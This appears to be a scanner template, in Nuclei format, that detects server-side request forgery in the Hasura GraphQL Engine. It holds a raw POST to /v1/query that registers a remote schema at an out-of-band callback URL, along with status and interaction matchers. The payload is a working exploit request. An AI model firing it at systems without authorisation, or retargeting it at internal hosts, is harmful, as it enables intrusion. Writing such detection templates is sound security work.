id: hasura-graphql-ssrf info: name: Hasura GraphQL Engine - SSRF Side Request Forgery author: princechaddha severity: high reference: https://cxsecurity.com/issue/WLB-2021040115 tags: hasura requests: - raw: - | POST /v1/query HTTP/1.1 Host: {{Hostname}} Content-Length: 381 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 content-type: application/json Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close { "type":"bulk", "args":[ { "type":"add_remote_schema", "args":{ "name":"test", "definition":{ "url":"https://{{interactsh-url}}", "headers":[ ], "timeout_seconds":60, "forward_client_headers":true } } } ] } matchers-condition: and matchers: - type: status status: - 400 - type: word part: interactsh_protocol words: - "http"